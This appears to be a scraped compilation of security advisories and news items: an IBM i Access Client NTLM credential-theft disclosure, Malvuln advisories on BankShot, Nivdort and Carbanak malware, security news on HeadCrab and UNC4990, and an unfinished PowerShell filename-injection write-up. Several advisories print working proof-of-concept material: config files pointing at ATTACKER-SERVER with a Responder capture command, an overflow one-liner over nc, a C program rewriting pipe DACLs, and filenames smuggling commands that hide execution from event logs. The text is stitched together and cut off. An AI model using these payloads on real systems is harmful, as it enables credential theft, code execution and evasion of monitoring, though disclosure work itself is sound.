IBM i Access Client Solutions (ACS) versions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.4 suffer from a remote credential theft vulnerability.

[+] Credits: John Page (aka hyp3rlinx)      
[+] Website: hyp3rlinx.altervista.org  
[+] Source:  http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt  
[+] twitter.com/hyp3rlinx  
[+] ISR: ApparitionSec     

[Vendor]  
www.ibm.com

[Product]  
IBM i Access Client Solutions

[Versions]  
All

[Remediation/Fixes]  
None

[Vulnerability Type]  
Remote Credential Theft

[CVE Reference]  
CVE-2024-22318

[Security Issue]  
IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations.  
Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server.  
If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session.  
The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials.

[References]  
https://www.ibm.com/support/pages/node/7116091

[Exploit/POC]  
The client access .HOD File vulnerable parameters:

1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c

[KeyRemapFile]  
2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c

Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv

The client access legacy .WS File vulnerable parameters:  
DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c

Example, client access older .WS file

[Profile]  
ID=WS  
Version=9  
[Telnet5250]  
AssociatedPrinterStartMinimized=N  
AssociatedPrinterTimeout=0  
SSLClientAuthentication=Y  
HostName=PWN  
AssociatedPrinterClose=N  
Security=CA400  
CertSelection=AUTOSELECT  
AutoReconnect=Y  
[KeepAlive]  
KeepAliveTimeOut=0  
[Keyboard]  
IBMDefaultKeyboard=N  
DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c  
[Communication]  
Link=telnet5250

[Network Access]  
Remote

[Severity]  
Medium

[Disclosure Timeline]  
Vendor Notification:  December 14, 2023  
Vendor Addresses Issue: February 7, 2024  
February 8, 2024 : Public Disclosure

[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information  
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

IBM i Access Client Solutions Remote Credential Theft

Cybersecurity researchers have detailed an updated version of the malware HeadCrab that's known to target Redis database servers across the world since early September 2021.
The development, which comes exactly a year after the malware was first publicly disclosed by Aqua, is a sign that the financially-motivated threat actor behind the campaign is actively adapting and

Cybersecurity researchers have detailed an updated version of the malware **HeadCrab** that's known to target Redis database servers across the world since early September 2021.

The development, which comes exactly a year after the malware was first publicly disclosed by Aqua, is a sign that the financially-motivated threat actor behind the campaign is actively adapting and refining their tactics and techniques to stay ahead of the detection curve.

The cloud security firm said that "the campaign has almost doubled the number of infected Redis servers," with an additional 1,100 compromised servers, up from 1,200 reported at the start of 2023.

HeadCrab is designed to infiltrate internet-exposed Redis servers and wrangle them into a botnet for illicitly mining cryptocurrency, while also leveraging the access in a manner that allows the threat actor to execute shell commands, load fileless kernel modules, and exfiltrate data to a remote server.

While the origins of the threat actor are presently not known, they make it a point to note in a "mini blog" embedded into the malware that the mining activity is "legal in my country" and that they do it because "it almost doesn't harm human life and feelings (if done right)."

The operator, however, acknowledges that it's a "parasitic and inefficient way" of making money, adding their aim is to make $15,000 per year.

"An integral aspect of the sophistication of HeadCrab 2.0 lies in its advanced evasion techniques," Aqua researchers Asaf Eitani and Nitzan Yaakov said. "In contrast to its predecessor (named HeadCrab 1.0), this new version employs a fileless loader mechanism, demonstrating the attacker's commitment to stealth and persistence."

It's worth noting that the previous iteration utilized the SLAVEOF command to download and save the HeadCrab malware file to disk, thereby leaving artifact traces on the file system.

HeadCrab 2.0, on the other hand, receives the malware's content over the Redis communication channel and stores it in a fileless location in a bid to minimize the forensic trail and make it much more challenging to detect.

Also changed in the new variant is the use of the Redis MGET command for command-and-control (C2) communications for added covertness.

"By hooking into this standard command, the malware gains the ability to control it during specific attacker-initiated requests," the researchers said.

"Those requests are achieved by sending a special string as an argument to the MGET command. When this specific string is detected, the malware recognizes the command as originating from the attacker, triggering the malicious C2 communication."

Describing HeadCrab 2.0 as an escalation in the sophistication of Redis malware, Aqua said its ability to masquerade its malicious activities under the guise of legitimate commands poses new problems for detection.

"This evolution underscores the necessity for continuous research and development in security tools and practices," the researchers concluded. "The engagement by the attacker and the subsequent evolution of the malware highlights the critical need for vigilant monitoring and intelligence gathering."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

HeadCrab 2.0 Goes Fileless, Targeting Redis Servers for Crypto Mining

Trojan.Win32 BankShot malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/f2fd6a7b400782bb43499e722fb62cf4.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Trojan.Win32 BankShot  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on TCP port 1978 and creates a local Windows service running with SYSTEM integrity. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting ECX, EIP registers and Structured Exception Handler (SEH)  
Family: BankShot  
Type: PE32  
MD5: f2fd6a7b400782bb43499e722fb62cf4  
Vuln ID: MVID-2024-0669  
ASLR: Not Enabled  
DEP: Enabled  
SEH: Not Enabled  
CFG: Not Enabled  
Disclosure: 01/30/2024

Memory Dump:  
(16bc.cf8): Access violation - code c0000005 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=41414141 edx=77309d70 esi=00000000 edi=00000000  
eip=41414141 esp=061511f0 ebp=06151210 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
41414141 ??              ???  
0:005> .ecxr  
eax=00000000 ebx=00000000 ecx=41414141 edx=77309d70 esi=00000000 edi=00000000  
eip=41414141 esp=061511f0 ebp=06151210 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
41414141 ??              ???  
0:005> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for MouseServer.exe  
*** ERROR: Module load completed but symbols could not be loaded for MouseServer.exe  
Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:   
MouseServer+2a95e  
0042a95e f3a4            rep movs byte ptr es:[edi],byte ptr [esi]

EXCEPTION_RECORD:  0624dec4 -- (.exr 0x624dec4)  
ExceptionAddress: 0042a95e (MouseServer+0x0002a95e)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000000  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 06250000  
Attempt to write to address 06250000

PROCESS_NAME:  MouseServer.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  41414141

WRITE_ADDRESS:  41414141 

FOLLOWUP_IP:   
MouseServer+2a95e  
0042a95e f3a4            rep movs byte ptr es:[edi],byte ptr [esi]

FAILED_INSTRUCTION_ADDRESS:   
+2a95e  
41414141 ??              ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

IP_ON_HEAP:  41414141

IP_IN_FREE_BLOCK: 41414141

CONTEXT:  0624df14 -- (.cxr 0x624df14)  
eax=027fce88 ebx=0624fbfc ecx=000008d8 edx=00001d00 esi=027fc5b0 edi=06250000  
eip=0042a95e esp=0624e374 ebp=0624fbf0 iopl=0         nv up ei pl nz na po cy  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010203  
MouseServer+0x2a95e:  
0042a95e f3a4            rep movs byte ptr es:[edi],byte ptr [esi]  
Resetting default scope

FAULTING_THREAD:  ffffffff

BUGCHECK_STR:  APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER:  from 41414141 to 0042a95e

FRAME_ONE_INVALID: 1

STACK_TEXT:    
0624e374 0042a95e mouseserver+0x2a95e  
0624fbf8 41414141 unknown!printable+0x0

STACK_COMMAND:  .cxr 000000000624DF14 ; kb ; dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; dds 624e374 ; kb

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  mouseserver+2a95e

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: MouseServer

IMAGE_NAME:  MouseServer.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  58eb1b3a

FAILURE_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_MouseServer.exe!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_mouseserver+2a95e

0:005> !exchain  
0624ddd4: ntdll!ExecuteHandler2+44 (77309d70)  
0624fbe4: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
C:\Users\gg\Desktop>python -c "print('A'*32000)" | nc64.exe x.x.x.x 1978  
system windows 6.2  
version 1.7.4.0  
serverid 7E8539FB-5E68-464F-AE62-129E95A7DFB8

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan.Win32 BankShot MVID-2024-0669 Buffer Overflow

A financially motivated threat actor known as UNC4990 is leveraging weaponized USB devices as an initial infection vector to target organizations in Italy.
Google-owned Mandiant said the attacks single out multiple industries, including health, transportation, construction, and logistics.
"UNC4990 operations generally involve widespread USB infection followed by the deployment of the

Cryptocurrency / Cybersecurity

A financially motivated threat actor known as **UNC4990** is leveraging weaponized USB devices as an initial infection vector to target organizations in Italy.

Google-owned Mandiant said the attacks single out multiple industries, including health, transportation, construction, and logistics.

"UNC4990 operations generally involve widespread USB infection followed by the deployment of the EMPTYSPACE downloader," the company said in a Tuesday report.

"During these operations, the cluster relies on third-party websites such as GitHub, Vimeo, and Ars Technica to host encoded additional stages, which it downloads and decodes via PowerShell early in the execution chain."

UNC4990, active since late 2020, is assessed to be operating out of Italy based on the extensive use of Italian infrastructure for command-and-control (C2) purposes.

It's currently not known if UNC4990 functions only as an initial access facilitator for other actors. The end goal of the threat actor is not clear, although in one instance an open-source cryptocurrency miner is said to have been deployed after months of beaconing activity.

Details of the campaign were previously documented by Fortgale and Yoroi in early December 2023, with the former tracking the adversary under the name Nebula Broker.

The infection begins when a victim double-clicks on a malicious LNK shortcut file on a removable USB device, leading to the execution of a PowerShell script that's responsible for downloading EMPTYSPACE (aka BrokerLoader or Vetta Loader) from a remote server via another intermedia PowerShell script hosted on Vimeo.

Yoroi said it identified four different variants of EMPTYSPACE written in Golang, .NET, Node.js, and Python, which subsequently acts as a conduit for fetching next-stage payloads over HTTP from the C2 server, including a backdoor dubbed QUIETBOARD.

A notable aspect of this phase is the use of popular sites like Ars Technica, GitHub, GitLab, and Vimeo for hosting the malicious payload.

"The content hosted on these services posed no direct risk for the everyday users of these services, as the content hosted in isolation was completely benign," Mandiant researchers said. "Anyone who may have inadvertently clicked or viewed this content in the past was not at risk of being compromised."

QUIETBOARD, on the other hand, is a Python-based backdoor with a wide range of features that allow it to execute arbitrary commands, alter crypto wallet addresses copied to clipboard to redirect fund transfers to wallets under their control, propagate the malware to removable drives, take screenshots, and gather system information.

Additionally, the backdoor is capable of modular expansion and running independent Python modules like coin miners as well as dynamically fetching and executing Python code from the C2 server.

"The analysis of both EMPTYSPACE and QUIETBOARD suggests how the threat actors took a modular approach in developing their toolset," Mandiant said.

"The use of multiple programming languages to create different versions of the EMPTYSPACE downloader and the URL change when the Vimeo video was taken down show a predisposition for experimentation and adaptability on the threat actors' side."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Italian Businesses Hit by Weaponized USBs Spreading Cryptojacking Malware

Debian Linux Security Advisory 5610-1 - Multiple security issues were discovered in Redis, a persistent key-value database, which could result in the execution of arbitrary code or ACL bypass.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5610-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 29, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : redisCVE ID         : CVE-2022-24834 CVE-2023-36824 CVE-2023-41053                 CVE-2023-41056 CVE-2023-45145Multiple security issues were discovered in Redis, a persistentkey-value database, which could result in the execution of arbitrarycode or ACL bypass.For the stable distribution (bookworm), these problems have been fixed inversion 5:7.0.15-1~deb12u1.We recommend that you upgrade your redis packages.For the detailed security status of redis please refer toits security tracker page at:https://security-tracker.debian.org/tracker/redisFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmW4FTMACgkQEMKTtsN8TjZJvBAAhC0xNfda1GVgbCT3iTVM6qoD5UD+ZzXbpvvn2FKApdD4prQdJyC4FHGvKX8V14qgqPb51nh9quOAmP07J6dCYlc8zesAq3VuffkspetRBw5NGfnlixgB7QXQ0/QTinQf7ErInV1BdfJVWPJ0PAxIVj3SkkiE+TysY5xkTijn+KcnnAKsbTiUYvwAAh8q27XYI4w5YWdSh87cA/hL5lfmWyzefPnp7rIrk/nHvkYs54/Rs6PuJaJ3tv4OQ3lfOotxvSzWKaNAQRlzPbgZsdl+HRTvmZUALDnZEr4ETD0T+lvkjU+srI7mndUmk9LvSxzcoUetQZEZLq/764jGurNysfxmHmiAEflzj1BC9OpDh4mm7bYFpFqqGZ9RP7Mvsh5Qae6lyWdqwhiumr60fjdzHYj/6ckeUDlnHgbOVHoultnMTQ8Px6GuWoEmK4JIrKZVjIS2FQ7V8sIBu38sGx+054RJeMqR6iO5bHzulwRJ0bIE8gh/47ElfszifMoZtFPnjW/PA0YnyWfWLWVLYwrwaIa7oP27atuz1LQX6reUO1t0zdwZN1YedU8pUxLHBYyozjQIVbV94QnPETRd6QQoNdtKdFcTrINYgQRiyvcjJGqaQ4VwL0Cw9tprDvFCM9x/OWVwT6ZTspYPWJ6qjBB9x8e9GBG2w0wSC1yeAc0zDoU==IDW1-----END PGP SIGNATURE-----

Debian Security Advisory 5610-1

TrojanSpy Win32 Nivdort malware suffers from an insecure permissions vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/15bda00b57e2ed729a45f7cfa62165da.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: TrojanSpy Win32 NivdortVulnerability: Insecure Permissions - EoP (SYSTEM) Family: NivdortType: PE32MD5: 15bda00b57e2ed729a45f7cfa62165daVuln ID: MVID-2024-0668Dropped files: dqrpgvnkh, egjrdhynfm, nhefhloix, rvoyf6ljtqg4zejno.exeDisclosure: 01/20/2024Description:The malware creates a service which runs as SYSTEM and grants change (C) permissions to the authenticated user group on its installation directory. Standard low integrity users can still rename the service executable while it is running, replace the PE file with their own and restart the infected system to start the service.C:\>cacls C:\pewcvmnvyr\jwgaklb.exeC:\pewcvmnvyr\jwgaklb.exe BUILTIN\Administrators:(ID)F                          NT AUTHORITY\SYSTEM:(ID)F                          BUILTIN\Users:(ID)R                          NT AUTHORITY\Authenticated Users:(ID)CC:\>sc qc "Group Key KtmRm Coordinator Registry TPM Bus"[SC] QueryServiceConfig SUCCESSSERVICE_NAME: Group Key KtmRm Coordinator Registry TPM Bus        TYPE               : 110  WIN32_OWN_PROCESS (interactive)        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 0   IGNORE        BINARY_PATH_NAME   : C:\pewcvmnvyr\jwgaklb.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : Group Key KtmRm Coordinator Registry TPM Bus        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystemExploit/PoC:Open a cmd prompt as standard user:1) unhide the service binary   C:\Users\norgt>attrib -s -h \pewcvmnvyr\jwgaklb.exe2) rename the service binaryC:\Users\norgt>ren \pewcvmnvyr\jwgaklb.exe PWNED3) optional replace with your own binary and escalate to SYSTEMC:\Users\norgt>dir \pewcvmnvyr\ Directory of C:\pewcvmnvyr        ..01/14/2024  02:05 AM                 0 dqrpgvnkh01/14/2024  02:05 AM                 6 egjrdhynfm01/14/2024  02:09 AM                 4 nhefhloix01/14/2024  02:05 AM           332,800 PWNED   <================= DONE01/14/2024  02:05 AM           332,800 rvoyf9njtqg4zejno.exeDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

TrojanSpy Win32 Nivdort MVID-2024-0668 Insecure Permissions

Redis raft versions master-1b8bd86 to master-7b46079 were discovered to contain an ODR violation via the component hiredisAllocFns at /opt/fs/redisraft/deps/hiredis/alloc.c.

    [Suggested description]Redis raft master-1b8bd86 to master-7b46079 was discovered to contain an ODR violation via the component hiredisAllocFns at /opt/fs/redisraft/deps/hiredis/alloc.c.[VulnerabilityType Other]AddressSanitizer: odr-violation[Vendor of Product]Redis[Affected Product Code Base]raft - master-1b8bd86 to master-7b46079[Affected Component]affected executable[Attack Type]Remote[Impact Code execution]true[Impact Denial of Service]true[Attack Vectors]run redis with redisraft[Reference]https://github.com/RedisLabs/redisraft/issues/600[Has vendor confirmed or acknowledged the vulnerability?]true[Discoverer]jerrytesting

Redis Raft ODR Violation

Backdoor.Win32 Carbanak (Anunak) malware creates 8 named pipes used for C2 and interprocess communications and grants RW access to the Everyone user group.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b8e1e5b832e5947f41fd6ae6ef6d09a1.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32 Carbanak (Anunak)Vulnerability: Named Pipe Null DACLFamily: CarbanakType: PE32MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1Vuln ID: MVID-2024-0667Dropped files: AlhEXlUJ.exe, AlhEXlUJbVpfX1EMVw.binDisclosure: 01/09/2024Description: Carbanak malware creates 8 named pipes used for C2 and interprocess communications and grants RW access to the Everyone user group.Low privileged users can modify the pipes DACLs, removing rights for Everyone denying access to all users. First 6 pipes are created by its parent processand last 2 by the child process. The pipes names are randomly generated each time it is run all except for one JFNfVUYDXmlZQV.Therefore, we can detect Carbanak by that one pipe, as the "JFNfVUYDXmlZQVI" pipe is always created regardless of other randomly named pipes.Listing Carbanaks named pipes they get grouped as they are created at same time with 2 of them listed prior to the JFNfVUYDXmlZQVI pipe.Carbanak creates a directory named "Mozilla" under ProgramData with hidden files, one of which is AlhEXlUJ.exe used by the service it creates which runs as SYSTEM. The malwares service names created seem to use an already existing service name and add "Sys" at the end of its name.Exploitation steps, output all named pipes and look for "JFNfVUYDXmlZQVI" if detected, exploit the DACL on 2 previously listed pipes and 5 pipes listed after.Successfully tested in VM environment.Carbanak IPC Named Pipes:\\.\Pipe\cltjLnYRKKjUESTvgGdmERTb   RW Everyone\\.\Pipe\tGYNSgZvVXwumEhdcF    RW Everyone\\.\Pipe\JFNfVUYDXmlZQVI   <=====  ALWAYS CREATED  RW Everyone\\.\Pipe\PoUXbOHFRuUZAufnlpMZoqdtIfOX  RW Everyone\\.\Pipe\oBcVHguxbnjGbSgkJptifqvNFgD  RW Everyone\\.\Pipe\iDToHxpSCbEIEHPBeQ  RW Everyone\\.\Pipe\YutsGUYwwUusszByeuXUQK  RW Everyone\\.\Pipe\UfnQmAUTVtEkYvMoUWAZekAuWZHe  RW EveryoneExploit/PoC:#include "windows.h"#include "stdio.h"#include "accctrl.h"#include "aclapi.h"/*Carbanak: 48d208b87b29d50bb160f336c94b681e232b0f90e8c02175e593d60737369c13DACL IPC named pipes created and grants RW access for Everyone.We can identify Carbanak as out of the eight pipes it creates with random names the pipenamed JFNfVUYDXmlZQVI is always created. Pipes are typically grouped as they are createdat same time and typically 2 are previous to pipe JFNfVUYDXmlZQVI and others are created afterOutput named pipes find JFNfVUYDXmlZQVI and exploit DACL on 2 previous and 5 after.Successfully tested in VM environment.By Malvuln**//** DISCLAIMER:Author is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**/#define CARBANAK_PIPE "JFNfVUYDXmlZQVI"#define MAX_TOKENS 1024#define DELIMITER "\n"int str2Array(char*** argv, char *str);int Exploit(char *carbanak_pipe);int str2Array(char*** argv, char *str){char* buffer;int argc;buffer = (char *) malloc(strlen(str) * sizeof(char));strcpy(buffer, str);(*argv) = (char**) malloc(MAX_TOKENS * sizeof(char**));  argc = 0;    (*argv)[argc++] = strtok(buffer, DELIMITER);  while ((((*argv)[argc] = strtok(NULL, DELIMITER)) != NULL) &&   (argc < MAX_TOKENS)) ++argc;return argc;}int main(void){system("dir /b \\\\.\\pipe\\\\ > tmp.sys");int ch;char tmp[1];FILE *fp = fopen("tmp.sys", "r");fseek(fp, 0, SEEK_END);int bytes = ftell(fp) + 256;rewind(fp);char x[bytes]; while((ch = fgetc(fp)) != EOF){      if(feof(fp)){      break;     }    sprintf(tmp, "%c", ch);    strcat(x, tmp);}fclose(fp);char **A;int i, result = str2Array(&A, x);int delay = 300;int rc;BOOL infected=FALSE;for(i=0;i<result;i++){    if(strcmp(A[i], CARBANAK_PIPE)==0){    printf("[+] Carbanak (Anunak) malware IPC exploit\n");    printf("[!] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n");    printf("[!] Named Pipe %s%s\n", CARBANAK_PIPE, " detected!");    printf("[+] Attack started...\n\n");        infected = TRUE;    Exploit(A[i]);    Sleep(delay);        Exploit(A[i-2]);    Sleep(delay);    Exploit(A[i-1]);    Sleep(delay);     Exploit(A[i+1]);    Sleep(delay);        Exploit(A[i+2]);    Sleep(delay);      Exploit(A[i+3]);    Sleep(delay);      Exploit(A[i+4]);    Sleep(delay);          rc = Exploit(A[i+5]);  }}    if(!infected){       printf("[+] Carbanak (Anunak) malware IPC Exploit \n");     printf("[+] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n");     printf("[!] Named Pipe %s%s", CARBANAK_PIPE, " not found on the system.\n");     printf("[!] Aborting...");    }    if(rc==0){      printf("\n[!] Done!");          }  printf("\n[+] By Malvuln circa 2024\n\n");  system("pause");  return 0;}int Exploit(char *malpipe){      char MALPIPE_PREFIX[269] = "\\\\.\\pipe\\";    strcat(MALPIPE_PREFIX, malpipe);    HANDLE hPipe = CreateFileA((LPCSTR)MALPIPE_PREFIX, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, 0, NULL);            PACL pOldDACL = NULL;    PACL pNewDACL = NULL;  if (hPipe == INVALID_HANDLE_VALUE){        int rc = GetLastError();      if(rc==5){       printf("[!] Access Denied for pipe: %s\n", malpipe);       }             return 1;}    if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){     printf("[!] Error: %d",  GetLastError());    return 1;  }      TRUSTEE trustee[1];    trustee[0].TrusteeForm = TRUSTEE_IS_NAME;    trustee[0].TrusteeType = TRUSTEE_IS_GROUP;    trustee[0].ptstrName = TEXT("Everyone");    trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;    trustee[0].pMultipleTrustee = NULL;    EXPLICIT_ACCESS explicit_access_list[1];    ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));    explicit_access_list[0].grfAccessMode = DENY_ACCESS;     explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;    explicit_access_list[0].grfInheritance = NO_INHERITANCE;    explicit_access_list[0].Trustee = trustee[0];        if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){       printf("[!] Error: %d",  GetLastError());      return 1;    }          if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){                   printf("[!] Error: %d",  GetLastError());       return 1;           }else{       printf("[+] Modifying IPC Pipe DACL ==> %s\n", MALPIPE_PREFIX);      }        LocalFree(pNewDACL);    LocalFree(pOldDACL);    CloseHandle(hPipe);        return 0;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32 Carbanak (Anunak) MVID-2024-0667 Named Pipe NULL DACL

Prior work from this researcher disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames. This research builds on their PSTrojanFile work, adding a PS command line single quote bypass and PS event logging failure. On Windows CL tab, completing a filename uses double quotes that can be leveraged to trigger arbitrary code execution. However, if the filename got wrapped in single quotes it failed, that is until now.

[+] Credits: John Page (aka hyp3rlinx)      
[+] Website: hyp3rlinx.altervista.org  
[+] Source:  http://hyp3rlinx.altervista.org/advisories/WINDOWS_POWERSHELL_SINGLE_QUOTE_CODE_EXEC_EVENT_LOG_BYPASS.txt  
[+] twitter.com/hyp3rlinx  
[+] ISR: ApparitionSec     

 [Vendor]  
www.microsoft.com

[Product]  
Microsoft Windows PowerShell

Built on the . NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.

[Vulnerability Type]  
PowerShell Single Quote Code Execution / Event Log Bypass

[CVE Reference]  
N/A

[Security Issue]  
In past times I disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames.  
This research builds on my "PSTrojanFile" work, adding a PS command line single quote bypass and PS event logging failure.  
On Windows CL tab completing a filename uses double quotes that can be leveraged to trigger arbitrary code execution.  
However, if the filename gets wrapped in single quotes it failed, that is until now.

[Single Quote Code Exec Bypass]  
Combining both the semicolon ";" and ampersand "&" characters, I found it bypasses the single quote limitation given a malicious filename.  
The trailing semicolon ";"  delimits the .XML extension and helps trigger the PE file specified in the case DOOM.exe and the PS event log gets truncated.

Take the following three test cases using Defender API which takes a specially crafted filename.  
C:\>powershell Set-ProcessMitigation -PolicyFilePath  "Test;saps DOOM;.xml"

1) Double quotes OK  
"Test;saps DOOM;.xml" 

2) Single quotes FAILS  
'Test;saps DOOM;.xml'

3) Single quotes BYPASS  
'Test&DOOM;.xml'

PowerShell API calls that prefix the "powershell" cmd is a requirement and may affect many built-in PS API or module commands.  
C:\Users\gg\Downloads\>powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'

Malware.exe lives in Downloads dir, notice how we only need a partial name as part of the .ZIP archive filename we are scanning here  
and that it also excludes the .EXE portion in that filename.

[PS Event Log Bypass]  
On Windows PowerShell event logging can be enabled to alert a SOC on suspicious activity and or for incident response forensic artifact purposes.  
However, when bypassing PS single quotes I noticed an interesting side effect. The ampersand "&" character seems to truncate the PS event log.  
Example, processing 'Infected&Malware;.zip' the Event ID 403 logs 'infected' and not the true name of 'Malware.exe' which was actually executed.

Want to mask the true name of the file from PowerShell Event logging? (Malware.exe lives in the same directory)  
C:\>powershell Get-Filehash  'Infected&Malware;.zip'  -algorithm MD5

Below the event log HostApplication contains 'infected' and not the true name of Malware.exe that was actually executed due to truncating.

